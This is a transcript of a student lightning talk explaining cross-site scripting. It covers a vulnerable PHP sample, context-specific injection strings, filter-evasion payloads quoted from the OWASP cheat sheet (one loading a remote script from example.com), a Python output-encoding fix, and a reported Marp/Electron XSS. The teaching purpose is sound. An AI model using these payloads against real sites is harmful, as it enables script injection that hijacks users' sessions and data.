Looking into XSS input values / searching xss insertion value
Tomoyuki KOYAMA
February 03, 2018
2018/02/03 Student LT at freee
Transcript
XSS
Speaker: B1. Twitter: @tmyk_kym. Blog: https://blog.koyama.me/. Network/Web/Server/Security. PyCon JP, Seccamp, etc.
XSS (Cross Site Scripting) is an HTML injection weakness, catalogued as CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (3.0).
Sample vulnerable page (PHP), which echoes the query parameter straight into the HTML:

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1><?php echo $_GET['mode']; ?></h1>

With $_GET['mode'] = hello the response is:

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1>hello</h1>

With $_GET['mode'] = <script>alert()</script> the injected tag is written out unchanged and the browser executes it:

    <!doctype html>
    <meta charset="utf-8">
    <title>XSS Sample</title>
    <h1><script>alert()</script></h1>
Types of XSS: Stored XSS, Reflected XSS, DOM Based XSS
XSS == XSS
Typical input values, each written for a different place in the HTML:

    <script>alert(1)</script>
    "><script>alert(1)</script>
    " onmouseover="alert(1)
    x" onerror="alert(1)       <- inside img src
    javascript:alert(1)        <- inside a href
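The five input values above each target a different output context of the PHP sample: element text, a quoted attribute value, and a URL attribute. The following is an added example (not code from the deck) that encodes each sink for its own context in Python; `render_page`, `safe_href` and `SAFE_SCHEMES` are names and assumptions of this example, and the sample inputs are constructed from the slide's list.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed sample inputs: the five input values listed on the slide, one per context.
TEXT_PAYLOAD = '<script>alert(1)</script>'
ATTR_PAYLOADS = ['"><script>alert(1)</script>', '" onmouseover="alert(1)', 'x" onerror="alert(1)']
HREF_PAYLOAD = 'javascript:alert(1)'

# Assumption of this example: links must be absolute and use one of these schemes;
# anything else (including relative URLs) is rejected, deny by default.
SAFE_SCHEMES = {'http', 'https', 'mailto'}


def render_text(value: str) -> str:
    """Text context, e.g. <h1><?php echo $_GET['mode']; ?></h1> from the slide.
    Escaping < > & " ' is enough here: the browser never sees a start tag."""
    return html.escape(value, quote=True)


def render_attr(name: str, value: str) -> str:
    """Quoted attribute context (img src, title, ...). The quote character must be
    escaped too, otherwise '">' and '" onerror="' close the value and inject markup."""
    return f'{name}="{html.escape(value, quote=True)}"'


def safe_href(value: str) -> str:
    """URL context (a href). Escaping cannot help here: javascript:alert(1) contains
    no HTML metacharacters. Decode character references and drop the tab/newline
    characters browsers ignore, then allow only an explicit safe scheme."""
    decoded = re.sub(r'[\t\r\n]', '', html.unescape(value)).strip()
    if urlsplit(decoded).scheme.lower() not in SAFE_SCHEMES:
        return '#'  # harmless fallback link
    return html.escape(decoded, quote=True)


def render_page(mode: str, title: str, link: str) -> str:
    """Counterpart of the slide's PHP sample with every sink encoded for its own context."""
    return (
        '<!doctype html><meta charset="utf-8"><title>XSS Sample</title>'
        f'<h1>{render_text(mode)}</h1>'
        f'<img src="x" {render_attr("title", title)}>'
        f'<a href="{safe_href(link)}">link</a>'
    )


if __name__ == '__main__':
    print(render_page(TEXT_PAYLOAD, ATTR_PAYLOADS[2], HREF_PAYLOAD))
```

The scheme check runs after entity decoding on purpose: a character reference inside `javascript:` is decoded by the browser before the URL is interpreted, so a check on the raw string would be bypassed.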
XSS
? / . XSS . XSS .
?
Source: OWASP XSS Filter Evasion Cheat Sheet, 2015 Japanese translation by JPCERT/CC: https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

Three entries picked from the cheat sheet:
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
    The `/` ends the tag name, so the browser parses this as
    <script xss="" src="http://example.com/xss.js"></script>

[2] <<SCRIPT>alert("XSS");//<</SCRIPT>
    Malformed HTML, but the XSS still works; the browser renders it as
    "><script> alert("XSS");//< </script>

[3] <img src=x onerror=javas cript:ale rt('XSS')>
    with &#x... hexadecimal HTML character references placed at the breaks in the attribute value.
    The browser decodes them inside the attribute, so it becomes
    <img src="x" onerror="javascript:alert('XSS')">
Other payloads from the cheat sheet:

    <img src=javascript:alert('XSS')>
    <img src=javascript: alert(String.fromCharCode(88,83,83))>
    <META HTTP-EQUIV="refresh" CONTENT="3; URL=http://;URL=http://yahoo.co.jp/;">
Marp is an Electron app, so its slides are rendered with web technology. Writing <script>alert()</script> into a slide makes the alert fire.

Reported as JVN#21174546: Marp JavaScript vulnerability, https://jvn.jp/jp/JVN21174546/. From "[Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp": "However, sanitizing inline script should consider on future."
XSS XSS alert() Electron